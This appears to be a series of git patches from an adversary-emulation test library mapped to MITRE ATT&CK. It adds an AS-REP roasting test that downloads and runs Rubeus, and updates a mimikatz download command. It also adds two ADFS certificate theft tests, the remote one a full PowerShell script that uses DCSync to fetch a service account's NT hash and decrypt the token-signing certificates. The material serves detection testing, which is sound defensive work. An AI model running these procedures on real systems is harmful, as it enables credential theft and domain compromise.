@@ -2,7 +2,7 @@
 | initial-access | execution | persistence | privilege-escalation | defense-evasion | credential-access | discovery | lateral-movement | collection | exfiltration | command-and-control | impact |
 |-----|-----|-----|-----|-----|-----|-----|-----|-----|-----|-----|-----|
 | Compromise Hardware Supply Chain [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [At (Windows)](../../T1053.002/T1053.002.md) | [Accessibility Features](../../T1546.008/T1546.008.md) | Abuse Elevation Control Mechanism [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Abuse Elevation Control Mechanism [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | ARP Cache Poisoning [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Account Discovery [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Component Object Model and Distributed COM [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | ARP Cache Poisoning [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Automated Exfiltration](../../T1020/T1020.md) | Application Layer Protocol [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Account Access Removal](../../T1531/T1531.md) |
-| Compromise Software Dependencies and Development Tools [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Command and Scripting Interpreter [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Account Manipulation](../../T1098/T1098.md) | Access Token Manipulation [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Access Token Manipulation [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | AS-REP Roasting [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Application Window Discovery](../../T1010/T1010.md) | [Distributed Component Object Model](../../T1021.003/T1021.003.md) | [Archive Collected Data](../../T1560/T1560.md) | Data Transfer Size Limits [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Asymmetric Cryptography [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Application Exhaustion Flood [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) |
+| Compromise Software Dependencies and Development Tools [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Command and Scripting Interpreter [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Account Manipulation](../../T1098/T1098.md) | Access Token Manipulation [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Access Token Manipulation [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [AS-REP Roasting](../../T1558.004/T1558.004.md) | [Application Window Discovery](../../T1010/T1010.md) | [Distributed Component Object Model](../../T1021.003/T1021.003.md) | [Archive Collected Data](../../T1560/T1560.md) | Data Transfer Size Limits [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Asymmetric Cryptography [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Application Exhaustion Flood [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) |
 | Compromise Software Supply Chain [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Component Object Model [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Active Setup [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Accessibility Features](../../T1546.008/T1546.008.md) | [Asynchronous Procedure Call](../../T1055.004/T1055.004.md) | Brute Force [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Browser Bookmark Discovery](../../T1217/T1217.md) | Exploitation of Remote Services [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Archive via Custom Method [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Exfiltration Over Alternative Protocol [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Bidirectional Communication [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Application or System Exploitation [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) |
 | [Default Accounts](../../T1078.001/T1078.001.md) | Component Object Model and Distributed COM [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Add-ins](../../T1137.006/T1137.006.md) | Active Setup [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [BITS Jobs](../../T1197/T1197.md) | Cached Domain Credentials [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Domain Account](../../T1087.002/T1087.002.md) | Internal Spearphishing [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Archive via Library [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Exfiltration Over Asymmetric Encrypted Non-C2 Protocol [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Commonly Used Port [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Data Destruction](../../T1485/T1485.md) |
 | Domain Accounts [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Dynamic Data Exchange](../../T1559.002/T1559.002.md) | AppCert DLLs [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | AppCert DLLs [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Binary Padding [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Credential API Hooking](../../T1056.004/T1056.004.md) | [Domain Groups](../../T1069.002/T1069.002.md) | Lateral Tool Transfer [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Archive via Utility](../../T1560.001/T1560.001.md) | Exfiltration Over Bluetooth [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Communication Through Removable Media [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Data Encrypted for Impact](../../T1486/T1486.md) |
diff --git a/atomics/Indexes/index.yaml b/atomics/Indexes/index.yaml
index 03b104ef..0eaa8989 100644
--- a/atomics/Indexes/index.yaml
+++ b/atomics/Indexes/index.yaml
@@ -240,7 +240,64 @@ credential-access:
       - Dan Nutting, @KerberToast
       x_mitre_platforms:
       - Windows
-    atomic_tests: []
+      identifier: T1558.004
+    atomic_tests:
+    - name: Rubeus asreproast
+      auto_generated_guid: 615bd568-2859-41b5-9aed-61f6a88e48dd
+      description: |
+        Information on the Rubeus tool and it's creators found here: https://github.com/GhostPack/Rubeus#asreproast
+        This build targets .NET 4.5.  If targeting a different version you will need to compile Rubeus
+      supported_platforms:
+      - windows
+      input_arguments:
+        local_folder:
+          description: Local path of Rubeus executable
+          type: Path
+          default: "$Env:temp"
+        local_executable:
+          description: name of the rubeus executable
+          type: String
+          default: rubeus.exe
+        out_file:
+          description: file where command results are stored
+          type: String
+          default: rubeus_output.txt
+        rubeus_url:
+          description: URL of Rubeus executable
+          type: url
+          default: https://github.com/morgansec/Rubeus/raw/de21c6607e9a07182a2d2eea20bb67a22d3fbf95/Rubeus/bin/Debug/Rubeus45.exe
+      dependency_executor_name: powershell
+      dependencies:
+      - description: 'Computer must be domain joined
+
+'
+        prereq_command: 'if((Get-CIMInstance -Class Win32_ComputerSystem).PartOfDomain)
+          {exit 0} else {exit 1}
+
+'
+        get_prereq_command: 'Write-Host Joining this computer to a domain must be
+          done manually
+
+'
+      - description: 'Rubeus must exist
+
+'
+        prereq_command: 'if(Test-Path -Path #{local_folder}\#{local_executable}) {exit
+          0} else {exit 1}
+
+'
+        get_prereq_command: 'Invoke-Webrequest -Uri #{rubeus_url} -OutFile #{local_folder}\#{local_executable}
+
+'
+      executor:
+        command: 'cmd.exe /c "#{local_folder}\#{local_executable}" asreproast /outfile:"#{local_folder}\#{out_file}"
+
+'
+        cleanup_command: 'Remove-Item #{local_folder}\#{out_file} -ErrorAction Ignore
+
+'
+        name: powershell
+        elevation_required: false
   T1552.003:
     technique:
       external_references:
diff --git a/atomics/T1558.004/T1558.004.md b/atomics/T1558.004/T1558.004.md
new file mode 100644
index 00000000..c0657cc6
--- /dev/null
+++ b/atomics/T1558.004/T1558.004.md
@@ -0,0 +1,79 @@
+# T1558.004 - AS-REP Roasting
+## [Description from ATT&CK](https://attack.mitre.org/techniques/T1558/004)
+<blockquote>Adversaries may reveal credentials of accounts that have disabled Kerberos preauthentication by [Password Cracking](https://attack.mitre.org/techniques/T1110/002) Kerberos messages.(Citation: Harmj0y Roasting AS-REPs Jan 2017) 
+
+Preauthentication offers protection against offline [Password Cracking](https://attack.mitre.org/techniques/T1110/002). When enabled, a user requesting access to a resource initiates communication with the Domain Controller (DC) by sending an Authentication Server Request (AS-REQ) message with a timestamp that is encrypted with the hash of their password. If and only if the DC is able to successfully decrypt the timestamp with the hash of the user’s password, it will then send an Authentication Server Response (AS-REP) message that contains the Ticket Granting Ticket (TGT) to the user. Part of the AS-REP message is signed with the user’s password.(Citation: Microsoft Kerberos Preauth 2014)
+
+For each account found without preauthentication, an adversary may send an AS-REQ message without the encrypted timestamp and receive an AS-REP message with TGT data which may be encrypted with an insecure algorithm such as RC4. The recovered encrypted data may be vulnerable to offline [Password Cracking](https://attack.mitre.org/techniques/T1110/002) attacks similarly to [Kerberoasting](https://attack.mitre.org/techniques/T1558/003) and expose plaintext credentials. (Citation: Harmj0y Roasting AS-REPs Jan 2017)(Citation: Stealthbits Cracking AS-REP Roasting Jun 2019) 
+
+An account registered to a domain, with or without special privileges, can be abused to list all domain accounts that have preauthentication disabled by utilizing Windows tools like [PowerShell](https://attack.mitre.org/techniques/T1059/001) with an LDAP filter. Alternatively, the adversary may send an AS-REQ message for each user. If the DC responds without errors, the account does not require preauthentication and the AS-REP message will already contain the encrypted data. (Citation: Harmj0y Roasting AS-REPs Jan 2017)(Citation: Stealthbits Cracking AS-REP Roasting Jun 2019)
+
+Cracked hashes may enable [Persistence](https://attack.mitre.org/tactics/TA0003), [Privilege Escalation](https://attack.mitre.org/tactics/TA0004), and [Lateral Movement](https://attack.mitre.org/tactics/TA0008) via access to [Valid Accounts](https://attack.mitre.org/techniques/T1078).(Citation: SANS Attacking Kerberos Nov 2014)</blockquote>
+
+## Atomic Tests
+
+- [Atomic Test #1 - Rubeus asreproast](#atomic-test-1---rubeus-asreproast)
+
+
+<br/>
+
+## Atomic Test #1 - Rubeus asreproast
+Information on the Rubeus tool and it's creators found here: https://github.com/GhostPack/Rubeus#asreproast
+This build targets .NET 4.5.  If targeting a different version you will need to compile Rubeus
+
+**Supported Platforms:** Windows
+
+
+**auto_generated_guid:** 615bd568-2859-41b5-9aed-61f6a88e48dd
+
+
+
+
+
+#### Inputs:
+| Name | Description | Type | Default Value |
+|------|-------------|------|---------------|
+| local_folder | Local path of Rubeus executable | Path | $Env:temp|
+| local_executable | name of the rubeus executable | String | rubeus.exe|
+| out_file | file where command results are stored | String | rubeus_output.txt|
+| rubeus_url | URL of Rubeus executable | url | https://github.com/morgansec/Rubeus/raw/de21c6607e9a07182a2d2eea20bb67a22d3fbf95/Rubeus/bin/Debug/Rubeus45.exe|
+
+
+#### Attack Commands: Run with `powershell`! 
+
+
+```powershell
+cmd.exe /c "#{local_folder}\#{local_executable}" asreproast /outfile:"#{local_folder}\#{out_file}"
+```
+
+#### Cleanup Commands:
+```powershell
+Remove-Item #{local_folder}\#{out_file} -ErrorAction Ignore
+```
+
+
+
+#### Dependencies:  Run with `powershell`!
+##### Description: Computer must be domain joined
+##### Check Prereq Commands:
+```powershell
+if((Get-CIMInstance -Class Win32_ComputerSystem).PartOfDomain) {exit 0} else {exit 1}
+```
+##### Get Prereq Commands:
+```powershell
+Write-Host Joining this computer to a domain must be done manually
+```
+##### Description: Rubeus must exist
+##### Check Prereq Commands:
+```powershell
+if(Test-Path -Path #{local_folder}\#{local_executable}) {exit 0} else {exit 1}
+```
+##### Get Prereq Commands:
+```powershell
+Invoke-Webrequest -Uri #{rubeus_url} -OutFile #{local_folder}\#{local_executable}
+```
+
+
+
+
+<br/>

From 5ea85dab6d84f470c57b415f114eace27506b46b Mon Sep 17 00:00:00 2001
From: Arioch <16936254+ZeArioch@users.noreply.github.com>
Date: Wed, 18 Aug 2021 23:27:26 +0200
Subject: [PATCH 25/39] T1055-2: update mimikatz download url (#1602)

* update mimikatz download url

* fix minor typo

Co-authored-by: Carrie Roberts <clr2of8@gmail.com>
---
 atomics/T1055/T1055.yaml | 3 ++-
 1 file changed, 2 insertions(+), 1 deletion(-)

diff --git a/atomics/T1055/T1055.yaml b/atomics/T1055/T1055.yaml
index d2fefd94..e6ecea77 100644
--- a/atomics/T1055/T1055.yaml
+++ b/atomics/T1055/T1055.yaml
@@ -63,7 +63,8 @@ atomic_tests:
     get_prereq_command: |
       $mimikatz_path = cmd /c echo #{mimikatz_path}
       [Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12
-      Invoke-WebRequest "https://github.com/gentilkiwi/mimikatz/releases/download/2.2.0-20200918-fix/mimikatz_trunk.zip" -OutFile "$env:TEMP\mimikatz.zip"
+      $mimikatz_relative_uri = Invoke-WebRequest "https://github.com/gentilkiwi/mimikatz/releases/latest" | Select-Object -ExpandProperty Links | Where-Object -Property href -Like "*/mimikatz_trunk.zip" | Select-Object -ExpandProperty href
+      Invoke-WebRequest "https://github.com$mimikatz_relative_uri" -OutFile "$env:TEMP\mimikatz.zip"
       Expand-Archive $env:TEMP\mimikatz.zip $env:TEMP\mimikatz -Force
       New-Item -ItemType Directory (Split-Path $mimikatz_path) -Force | Out-Null
       Move-Item $env:TEMP\mimikatz\x64\mimikatz.exe $mimikatz_path -Force

From 7110df309816720580ea4b109ed89bc098f9950f Mon Sep 17 00:00:00 2001
From: CircleCI Atomic Red Team doc generator <email>
Date: Wed, 18 Aug 2021 21:27:57 +0000
Subject: [PATCH 26/39] Generate docs from
 job=generate_and_commit_guids_and_docs branch=master [skip ci]

---
 atomics/Indexes/index.yaml | 6 ++++--
 atomics/T1055/T1055.md     | 3 ++-
 2 files changed, 6 insertions(+), 3 deletions(-)

diff --git a/atomics/Indexes/index.yaml b/atomics/Indexes/index.yaml
index 0eaa8989..280d6c9c 100644
--- a/atomics/Indexes/index.yaml
+++ b/atomics/Indexes/index.yaml
@@ -15746,7 +15746,8 @@ privilege-escalation:
         get_prereq_command: |
           $mimikatz_path = cmd /c echo #{mimikatz_path}
           [Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12
-          Invoke-WebRequest "https://github.com/gentilkiwi/mimikatz/releases/download/2.2.0-20200918-fix/mimikatz_trunk.zip" -OutFile "$env:TEMP\mimikatz.zip"
+          $mimikatz_relative_uri = Invoke-WebRequest "https://github.com/gentilkiwi/mimikatz/releases/latest" | Select-Object -ExpandProperty Links | Where-Object -Property href -Like "*/mimikatz_trunk.zip" | Select-Object -ExpandProperty href
+          Invoke-WebRequest "https://github.com$mimikatz_relative_uri" -OutFile "$env:TEMP\mimikatz.zip"
           Expand-Archive $env:TEMP\mimikatz.zip $env:TEMP\mimikatz -Force
           New-Item -ItemType Directory (Split-Path $mimikatz_path) -Force | Out-Null
           Move-Item $env:TEMP\mimikatz\x64\mimikatz.exe $mimikatz_path -Force
@@ -31921,7 +31922,8 @@ defense-evasion:
         get_prereq_command: |
           $mimikatz_path = cmd /c echo #{mimikatz_path}
           [Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12
-          Invoke-WebRequest "https://github.com/gentilkiwi/mimikatz/releases/download/2.2.0-20200918-fix/mimikatz_trunk.zip" -OutFile "$env:TEMP\mimikatz.zip"
+          $mimikatz_relative_uri = Invoke-WebRequest "https://github.com/gentilkiwi/mimikatz/releases/latest" | Select-Object -ExpandProperty Links | Where-Object -Property href -Like "*/mimikatz_trunk.zip" | Select-Object -ExpandProperty href
+          Invoke-WebRequest "https://github.com$mimikatz_relative_uri" -OutFile "$env:TEMP\mimikatz.zip"
           Expand-Archive $env:TEMP\mimikatz.zip $env:TEMP\mimikatz -Force
           New-Item -ItemType Directory (Split-Path $mimikatz_path) -Force | Out-Null
           Move-Item $env:TEMP\mimikatz\x64\mimikatz.exe $mimikatz_path -Force
diff --git a/atomics/T1055/T1055.md b/atomics/T1055/T1055.md
index 7f6c7a39..89bdde81 100644
--- a/atomics/T1055/T1055.md
+++ b/atomics/T1055/T1055.md
@@ -111,7 +111,8 @@ if (Test-Path $mimikatz_path) {exit 0} else {exit 1}
 ```powershell
 $mimikatz_path = cmd /c echo #{mimikatz_path}
 [Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12
-Invoke-WebRequest "https://github.com/gentilkiwi/mimikatz/releases/download/2.2.0-20200918-fix/mimikatz_trunk.zip" -OutFile "$env:TEMP\mimikatz.zip"
+$mimikatz_relative_uri = Invoke-WebRequest "https://github.com/gentilkiwi/mimikatz/releases/latest" | Select-Object -ExpandProperty Links | Where-Object -Property href -Like "*/mimikatz_trunk.zip" | Select-Object -ExpandProperty href
+Invoke-WebRequest "https://github.com$mimikatz_relative_uri" -OutFile "$env:TEMP\mimikatz.zip"
 Expand-Archive $env:TEMP\mimikatz.zip $env:TEMP\mimikatz -Force
 New-Item -ItemType Directory (Split-Path $mimikatz_path) -Force | Out-Null
 Move-Item $env:TEMP\mimikatz\x64\mimikatz.exe $mimikatz_path -Force

From 0fd43a3d6314e7f3a78f0695950f97a25a8f24bd Mon Sep 17 00:00:00 2001
From: piaconsigny <pia.consigny@epita.fr>
Date: Thu, 19 Aug 2021 11:20:48 +0200
Subject: [PATCH 27/39] add adfs certificates theft

---
 atomics/T1552.004/T1552.004.yaml | 96 ++++++++++++++++++++++++++++++++
 1 file changed, 96 insertions(+)

diff --git a/atomics/T1552.004/T1552.004.yaml b/atomics/T1552.004/T1552.004.yaml
index 431e5b0c..a1129a9b 100644
--- a/atomics/T1552.004/T1552.004.yaml
+++ b/atomics/T1552.004/T1552.004.yaml
@@ -103,3 +103,99 @@ atomic_tests:
     cleanup_command: |
       rm -rf #{output_folder}
     name: sh
+- name: ADFS token signing and encryption certificates theft - Local
+  auto_generated_guid: 78e95057-d429-4e66-8f82-0f060c1ac96f
+  description: |
+    Retrieve ADFS token signing and encrypting certificates. This is a precursor to the Golden SAML attack (T1606.002). You must be signed in as Administrator on an ADFS server.
+    Based on https://o365blog.com/post/adfs/ and https://github.com/fireeye/ADFSDump.
+  supported_platforms:
+  - windows
+  dependency_executor_name: powershell
+  dependencies:
+  - description: |
+      AADInternals module must be installed.
+    prereq_command: |
+      if (Get-Module AADInternals) {exit 0} else {exit 1}
+    get_prereq_command: |
+      Install-Module -Name AADInternals -Force
+  executor:
+    command: |
+      Import-Module AADInternals -Force
+      Export-AADIntADFSCertificates
+      Get-ChildItem | Where-Object {$_ -like "ADFS*"}
+      Write-Host "`nCertificates retrieved successfully"
+    cleanup_command: |
+      Remove-Item -Path ".\ADFS_encryption.pfx"
+      Remove-Item -Path ".\ADFS_signing.pfx"
+    name: powershell
+- name: ADFS token signing and encryption certificates theft - Remote
+  auto_generated_guid: cab413d8-9e4a-4b8d-9b84-c985bd73a442
+  description: |
+    Retrieve ADFS token signing and encrypting certificates. This is a precursor to the Golden SAML attack (T1606.002). You must be signed in as a Domain Administrators user on a domain-joined computer.
+    Based on https://o365blog.com/post/adfs/ and https://github.com/fireeye/ADFSDump.
+  supported_platforms:
+  - windows
+  input_arguments:
+    adfs_service_account_name:
+      description: Name of the ADFS service account
+      type: String
+      default: "adfs_svc"
+    replication_user:
+      description: Username with replication rights. It can be the Domain Admin running the script
+      type: String
+      default: "Administrator"
+    replication_password:
+      description: Password of replication_username
+      type: String
+      default: "ReallyStrongPassword"
+    adfs_server_name:
+      description: Name of an ADFS server
+      type: String
+      default: "sts.contoso.com"
+  dependency_executor_name: powershell
+  dependencies:
+  - description: |
+      AADInternals and ActiveDirectory modules must be installed.
+    prereq_command: |
+      if ($(Get-Module AADInternals) -or $(Get-Module -ListAvailable -Name ActiveDirectory)) {echo 0} else {echo 1}
+    get_prereq_command: |
+      Install-Module -Name AADInternals -Force
+  executor:
+    command: |
+      Import-Module ActiveDirectory -Force 
+      Import-Module AADInternals -Force | Out-Null
+      #Get Configuration
+      $dcServerName = (Get-ADDomainController).HostName
+      $svc = Get-ADObject -filter * -Properties objectguid,objectsid | Where-Object name -eq "#{adfs_service_account_name}"
+      $PWord = ConvertTo-SecureString -String "#{replication_password}" -AsPlainText -Force
+      $Credential = New-Object -TypeName System.Management.Automation.PSCredential -ArgumentList #{replication_user}, $PWord
+      # use DCSync to fetch the ADFS service account's NT hash
+      $hash = Get-AADIntADUserNTHash -ObjectGuid $svc.ObjectGuid -Credentials $Credential -Server $dcServerName -AsHex
+      $ADFSConfig = Export-AADIntADFSConfiguration -Hash $hash -SID $svc.Objectsid.Value -Server #{adfs_server_name}
+      # Get certificates decryption key
+      $Configuration = [xml]$ADFSConfig
+      $group = $Configuration.ServiceSettingsData.PolicyStore.DkmSettings.Group
+      $container = $Configuration.ServiceSettingsData.PolicyStore.DkmSettings.ContainerName
+      $parent = $Configuration.ServiceSettingsData.PolicyStore.DkmSettings.ParentContainerDn
+      $base = "LDAP://CN=$group,$container,$parent"
+      $ADSearch = [System.DirectoryServices.DirectorySearcher]::new([System.DirectoryServices.DirectoryEntry]::new($base))
+      $ADSearch.Filter = '(name=CryptoPolicy)'
+      $ADSearch.PropertiesToLoad.Clear()
+      $ADSearch.PropertiesToLoad.Add("displayName") | Out-Null
+      $aduser = $ADSearch.FindOne()
+      $keyObjectGuid = $ADUser.Properties["displayName"] 
+      $ADSearch.PropertiesToLoad.Clear()
+      $ADSearch.PropertiesToLoad.Add("thumbnailphoto") | Out-Null
+      $ADSearch.Filter="(l=$keyObjectGuid)"
+      $aduser=$ADSearch.FindOne() 
+      $key=[byte[]]$aduser.Properties["thumbnailphoto"][0] 
+      # Get encrypted certificates from configuration and decrypt them
+      Export-AADIntADFSCertificates -Configuration $ADFSConfig -Key $key
+      Get-ChildItem | Where-Object {$_ -like "ADFS*"}
+      Write-Host "`nCertificates retrieved successfully"
+    cleanup_command: |
+      Remove-Item -Path ".\ADFS_encryption.pfx"
+      Remove-Item -Path ".\ADFS_signing.pfx"
+    name: powershell
+
+

From 697d400d0eb6225b5c6ac1731ce49559afa76542 Mon Sep 17 00:00:00 2001
From: Carrie Roberts <clr2of8@gmail.com>
Date: Thu, 19 Aug 2021 08:15:15 -0600
Subject: [PATCH 28/39] bump layer version (#1608)

---
 bin/generate-atomic-docs.rb | 2 +-
 1 file changed, 1 insertion(+), 1 deletion(-)

diff --git a/bin/generate-atomic-docs.rb b/bin/generate-atomic-docs.rb
index d6be5034..3c91df76 100755
--- a/bin/generate-atomic-docs.rb
+++ b/bin/generate-atomic-docs.rb
@@ -190,7 +190,7 @@ class AtomicRedTeamDocs
 
   def get_layer(techniques, layer_name)
     layer = {
-      "version" => "4.1",
+      "version" => "4.2",
       "name" => layer_name,
       "description" => layer_name + " MITRE ATT&CK Navigator Layer",
       "domain" => "mitre-enterprise",

From 9b8c28e748f5dc537a8b2df1e61d9397b5c0810f Mon Sep 17 00:00:00 2001
From: CircleCI Atomic Red Team doc generator <email>
Date: Thu, 19 Aug 2021 14:15:53 +0000
Subject: [PATCH 29/39] Generate docs from
 job=generate_and_commit_guids_and_docs branch=master [skip ci]

---
 .../Attack-Navigator-Layers/art-navigator-layer-azure-ad.json   | 2 +-
 .../Attack-Navigator-Layers/art-navigator-layer-containers.json | 2 +-
 .../art-navigator-layer-google-workspace.json                   | 2 +-
 .../Attack-Navigator-Layers/art-navigator-layer-iaas-aws.json   | 2 +-
 .../Attack-Navigator-Layers/art-navigator-layer-iaas-azure.json | 2 +-
 .../Attack-Navigator-Layers/art-navigator-layer-iaas-gcp.json   | 2 +-
 .../Attack-Navigator-Layers/art-navigator-layer-iaas.json       | 2 +-
 .../Attack-Navigator-Layers/art-navigator-layer-linux.json      | 2 +-
 .../Attack-Navigator-Layers/art-navigator-layer-macos.json      | 2 +-
 .../Attack-Navigator-Layers/art-navigator-layer-office-365.json | 2 +-
 .../Attack-Navigator-Layers/art-navigator-layer-windows.json    | 2 +-
 .../Indexes/Attack-Navigator-Layers/art-navigator-layer.json    | 2 +-
 12 files changed, 12 insertions(+), 12 deletions(-)

diff --git a/atomics/Indexes/Attack-Navigator-Layers/art-navigator-layer-azure-ad.json b/atomics/Indexes/Attack-Navigator-Layers/art-navigator-layer-azure-ad.json
index 26b3b6a1..5173cb9e 100644
--- a/atomics/Indexes/Attack-Navigator-Layers/art-navigator-layer-azure-ad.json
+++ b/atomics/Indexes/Attack-Navigator-Layers/art-navigator-layer-azure-ad.json
@@ -1 +1 @@
-{"version":"4.1","name":"Atomic Red Team (Azure-AD)","description":"Atomic Red Team (Azure-AD) MITRE ATT&CK Navigator Layer","domain":"mitre-enterprise","gradient":{"colors":["#ce232e","#ce232e"],"minValue":0,"maxValue":100},"legendItems":[{"label":"Has at least one test","color":"#ce232e"}],"techniques":[{"techniqueID":"T1098.001","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1098.001/T1098.001.md"},{"techniqueID":"T1098","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1098.001/T1098.001.md"},{"techniqueID":"T1110.001","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1110.001/T1110.001.md"},{"techniqueID":"T1110","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1110.001/T1110.001.md"},{"techniqueID":"T1110.003","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1110.003/T1110.003.md"},{"techniqueID":"T1110","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1110.003/T1110.003.md"}]}
\ No newline at end of file
+{"version":"4.2","name":"Atomic Red Team (Azure-AD)","description":"Atomic Red Team (Azure-AD) MITRE ATT&CK Navigator Layer","domain":"mitre-enterprise","gradient":{"colors":["#ce232e","#ce232e"],"minValue":0,"maxValue":100},"legendItems":[{"label":"Has at least one test","color":"#ce232e"}],"techniques":[{"techniqueID":"T1098.001","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1098.001/T1098.001.md"},{"techniqueID":"T1098","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1098.001/T1098.001.md"},{"techniqueID":"T1110.001","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1110.001/T1110.001.md"},{"techniqueID":"T1110","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1110.001/T1110.001.md"},{"techniqueID":"T1110.003","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1110.003/T1110.003.md"},{"techniqueID":"T1110","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1110.003/T1110.003.md"}]}
\ No newline at end of file
diff --git a/atomics/Indexes/Attack-Navigator-Layers/art-navigator-layer-containers.json b/atomics/Indexes/Attack-Navigator-Layers/art-navigator-layer-containers.json
index 5dc65d44..23e5ef7e 100644
--- a/atomics/Indexes/Attack-Navigator-Layers/art-navigator-layer-containers.json
+++ b/atomics/Indexes/Attack-Navigator-Layers/art-navigator-layer-containers.json
@@ -1 +1 @@
-{"version":"4.1","name":"Atomic Red Team (Containers)","description":"Atomic Red Team (Containers) MITRE ATT&CK Navigator Layer","domain":"mitre-enterprise","gradient":{"colors":["#ce232e","#ce232e"],"minValue":0,"maxValue":100},"legendItems":[{"label":"Has at least one test","color":"#ce232e"}],"techniques":[{"techniqueID":"T1053.007","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1053.007/T1053.007.md"},{"techniqueID":"T1053","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1053.007/T1053.007.md"},{"techniqueID":"T1552.007","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1552.007/T1552.007.md"},{"techniqueID":"T1552","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1552.007/T1552.007.md"},{"techniqueID":"T1609","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1609/T1609.md"},{"techniqueID":"T1611","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1611/T1611.md"}]}
\ No newline at end of file
+{"version":"4.2","name":"Atomic Red Team (Containers)","description":"Atomic Red Team (Containers) MITRE ATT&CK Navigator Layer","domain":"mitre-enterprise","gradient":{"colors":["#ce232e","#ce232e"],"minValue":0,"maxValue":100},"legendItems":[{"label":"Has at least one test","color":"#ce232e"}],"techniques":[{"techniqueID":"T1053.007","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1053.007/T1053.007.md"},{"techniqueID":"T1053","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1053.007/T1053.007.md"},{"techniqueID":"T1552.007","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1552.007/T1552.007.md"},{"techniqueID":"T1552","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1552.007/T1552.007.md"},{"techniqueID":"T1609","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1609/T1609.md"},{"techniqueID":"T1611","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1611/T1611.md"}]}
\ No newline at end of file
diff --git a/atomics/Indexes/Attack-Navigator-Layers/art-navigator-layer-google-workspace.json b/atomics/Indexes/Attack-Navigator-Layers/art-navigator-layer-google-workspace.json
index 6a5ee1b8..3f0c17f4 100644
--- a/atomics/Indexes/Attack-Navigator-Layers/art-navigator-layer-google-workspace.json
+++ b/atomics/Indexes/Attack-Navigator-Layers/art-navigator-layer-google-workspace.json
